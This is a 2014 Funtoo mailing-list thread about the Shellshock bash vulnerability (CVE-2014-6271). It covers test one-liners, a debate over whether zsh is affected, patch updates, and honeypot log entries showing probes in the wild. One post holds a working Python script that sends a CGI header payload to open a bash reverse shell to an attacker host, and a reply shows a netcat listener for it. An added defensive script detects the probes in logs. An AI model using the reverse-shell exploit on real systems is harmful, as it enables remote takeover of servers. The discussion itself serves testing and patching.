Remote exploit vulnerability in bash CVE-2014-6271


Raphael Bastos

Sep 24, 2014, 3:49:46 PM
to funto...@googlegroups.com
Hello,

Take a look drobbins and oleg:



Funtoo is affected :(

cloud ~ # env x='() { :;}; echo vulneravel' sh -c "echo isso eh um teste"
vulneravel
isso eh um teste


Att,
Raphael Bastos aka Coffnix

====================================================
Linux Reg. User: 388431  //  LPI ID: LPI000214711
email:~> $ echo "xgvngkrhgyzuyFngiqyzuxk4ius4hx" | perl -pe \ 's/(.)/chr(ord($1)-2*3)/ge'
Yaxkin/Gentoo Linux - http://downloads.hackstore.com.br
Wiki Hackstore - http://wiki.hackstore.com.br
Área 31 Hackerspace - http://www.area31.net.br
Kankin/Funtoo Linux - http://kankin.area31.net.br
====================================================

Mit Zip

Sep 24, 2014, 4:33:38 PM
to funto...@googlegroups.com
Just tested on zsh 5.0.6, it's affected too...

Jon Cox

Sep 24, 2014, 4:52:47 PM
to funto...@googlegroups.com
Mit,

How did you test this? I can't seem to replicate with the same zsh version.

jcox@udu:~ % env x="() { :; }; echo 'vulnerable'" zsh -c "this is a test"
zsh:1: command not found: this
jcox@udu:~ % env x="() { :; }; echo 'vulnerable'" sh -c "this is a test"
vulnerable
sh: this: command not found

Have I missed something?

Cheers,
Jon

Mit Zip

Sep 24, 2014, 5:05:23 PM
to funto...@googlegroups.com
I did the originally posted command from within a zsh shell.

Raphael Bastos

Sep 24, 2014, 5:08:05 PM
to funto...@googlegroups.com
Hi,

ZSH == BASH ????? :P

Practices "cloned" development or just use the same code? : P





Mit Zip

Sep 24, 2014, 11:21:11 PM
to funto...@googlegroups.com
I love funtoo/gentoo... let me count the ways...

env x='() { :;}; echo boo, imma keylogger' sh -c "echo this is a test"   
sh: warning: x: ignoring function definition attempt
sh: error importing function definition for `x'
this is a test

got an upgrade already to 4.2_p48 which fixed zsh BTW

Raphael Bastos

Sep 25, 2014, 2:15:53 PM
to funto...@googlegroups.com



Mit Zip

Sep 25, 2014, 3:32:55 PM
to funto...@googlegroups.com
I love Gentoo/Funtoo AGAIN, let me count the ways...

bash-4.2_p48-r1 was released that has fixed the first incomplete patch...

However, I attempted to exploit servers with the first patch using a method that supposedly the first patch couldn't protect against. They were running nginx+owncloud on funtoo and apache+wordpress on centos 6.5, and I could not get the new exploit to work after fiddling with it for quite some time. That may be speaking to my skill more than anything else, but it seems the first patch at least makes things a little more difficult.

With the latest patch I couldn't even get the exploits to work with direct terminal access, where I could before the patch.

Also, check this thread out... http://seclists.org/oss-sec/2014/q3/685

Mit Zip

Sep 25, 2014, 3:35:25 PM
to funto...@googlegroups.com
On Thursday, September 25, 2014 2:32:55 PM UTC-5, Mit Zip wrote:
...

However, I attempted to exploit servers with the first patch using a method that supposedly the first patch couldn't protect against, they were running nginx+owncloud on funtoo and apache+wordpress on centos 6.5 and could not get the new exploit to work after fiddling with it for quite some time.
...

I should clarify that my attempts to exploit the servers were via malicious HTTP headers via openssl and telnet ...

James Lee

Sep 25, 2014, 3:38:29 PM
to funto...@googlegroups.com
On 09/24/2014 11:21 PM, Mit Zip wrote:
> I love funtoo/gentoo... let me count the ways...
>
> env x='() { :;}; echo boo, imma keylogger' sh -c "echo this is a test"
> sh: warning: x: ignoring function definition attempt
> sh: error importing function definition for `x'
> this is a test
>
> got an upgrade already to 4.2_p48 which fixed zsh BTW

I'm sure it doesn't need to be said, but I will say it anyway. ZSH was
not affected by this vulnerability. The command you are using to test
the vulnerability executes 'sh' which on most Linux systems is bash.
Change 'sh' to 'zsh' and you will see.

James

--
James Lee
https://thestaticvoid.com

Raphael Bastos

Sep 25, 2014, 3:47:00 PM
to funto...@googlegroups.com
Hi Mit Zip, Try this. :D

----------------------------------------------------------------------------------------------------------------------
#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
    exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
    "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

------------------------------------------------------------------------------------------------------------------------------------



Mit Zip

Sep 25, 2014, 4:02:04 PM
to funto...@googlegroups.com
Thanks for the clarification. Being ignorant of the internals of zsh, I assumed that zsh was using bash for certain things and that it wasn't a zsh issue per se.

Initially, I assumed that zsh would somehow have something to do with how environment variables are exposed to programs run, like running sh (which I did understand was bash). Though upon applying the first patch I realized that if zsh did have anything to do with it, it was delegating that function to bash.

Upon further consideration, it seems that it is entirely how bash reads in the environment and zsh is completely hands off.

Mit Zip

Sep 25, 2014, 4:02:56 PM
to funto...@googlegroups.com
Thanks for the PoC python code, but unfortunately, I have no applicable CGI scripts to test against.

Mit Zip

Sep 25, 2014, 4:12:20 PM
to funto...@googlegroups.com
I guess I could read the whole script before I respond, thanks this will work just fine. (facepalm)

CGIs are more likely because they run with an environment provided by the webserver. I'm not sure how similar running php with fastcgi is to that, but I'll see what happens. The other server is using mod_php, so unless wordpress makes some system calls, I would guess it would have a much lower likelihood of being affected.

Mit Zip

Sep 25, 2014, 5:44:42 PM
to funto...@googlegroups.com
On Thursday, September 25, 2014 2:47:00 PM UTC-5, Raphael Bastos wrote:
> Hi Mit Zip, Try this. :D
>
> ----------------------------------------------------------------------------------------------------------------------
> #
> #CVE-2014-6271 cgi-bin reverse shell
> #

No dice with the nginx/php-fpm/owncloud system patched with patch 2 and the apache/mod_php/wordpress system patched with patch 1, tested with POST as well as GET requests. Netcat never received any connections.

nc -l -p 8080 -vvv

FWIW, I think this script does not take advantage of the incompleteness of the first patch.

I would also mention that on my honeypot server the logs are showing some new attempts by third parties that seemingly are attempting to exploit this bug in the wild.
199.27.179.96 - - [24/Sep/2014:05:35:37 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"
222.167.189.81 - - [25/Sep/2014:11:55:59 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"
180.150.67.2 - - [25/Sep/2014:14:20:12 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"

Seems to be scanning systems for a tmUnblock.cgi script that apparently is perceived to be vulnerable, along with some hits on php.cgi. Could be a coincidence, but the requests for cgi scripts have definitely gone up in the past 48 hours.

Mit Zip

Sep 25, 2014, 5:53:38 PM
to funto...@googlegroups.com
This is no coincidence....

89.207.135.125 - - [25/Sep/2014:06:41:37 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 392 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" "-"
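As an added example (not code from the thread or from Funtoo), here is a defender-side check over access-log lines in the layout Mit Zip pasted: it parses the combined-log fields, flags header values carrying the "() {" function-definition prefix that unpatched bash imports from the environment, and counts requests for CGI paths so the rise in CGI probing is measurable. The sample lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from collections import Counter

# Constructed sample lines (not the thread's own entries) in the same
# combined-log layout as the honeypot excerpts above; addresses are RFC 5737
# documentation ranges and the ping target is a placeholder.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2014:05:35:37 -0500] "GET /tmUnblock.cgi HTTP/1.1" 400 326 "-" "-" "-"
192.0.2.11 - - [25/Sep/2014:06:41:37 -0500] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 301 392 "-" "() { :;}; /bin/ping -c 1 198.51.100.7" "-"
192.0.2.12 - - [25/Sep/2014:07:02:10 -0500] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "-"
192.0.2.13 - - [25/Sep/2014:07:05:44 -0500] "GET /cgi-bin/php.cgi HTTP/1.1" 404 209 "() {:;}; echo probe" "curl/7.30" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Unpatched bash treated any environment value beginning with "() {" as a
# function definition. CGI copies request headers into the environment
# (User-Agent -> HTTP_USER_AGENT, Referer -> HTTP_REFERER), so that prefix in
# a header field is the signature to alert on; whitespace variants are tolerated.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

def parse_line(line):
    """Split one combined-log line into named fields, or None if malformed."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def probe_fields(entry):
    """Names of the header-derived fields that carry the "() {" signature."""
    return [f for f in ("referer", "agent") if SHELLSHOCK_RE.search(entry[f])]

def analyze(log_text):
    """Return (list of (ip, path, matched fields), Counter of CGI paths)."""
    hits, cgi_paths = [], Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        path = entry["path"]
        if path.lower().endswith(".cgi") or "/cgi-" in path:
            cgi_paths[path] += 1
        fields = probe_fields(entry)
        if fields:
            hits.append((entry["ip"], path, fields))
    return hits, cgi_paths

if __name__ == "__main__":
    hits, cgi_paths = analyze(SAMPLE_LOG)
    for ip, path, fields in hits:
        print("shellshock probe from %s against %s via %s" % (ip, path, ",".join(fields)))
    print("CGI requests by path:", dict(cgi_paths))
```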

Mit Zip

Sep 25, 2014, 7:11:28 PM
to funto...@googlegroups.com
Not to be spamming you good funtoo folks, this felt justified...

https://shellshock.detectify.com/

Alright, no more speaking for me, unless spoken to. ;-)

Daniel Robbins

Sep 25, 2014, 7:39:46 PM
to funtoo development mailing list
I've just finished updating funtoo infrastructure and *all* user containers on funtoo.org to the new bash...

-Daniel
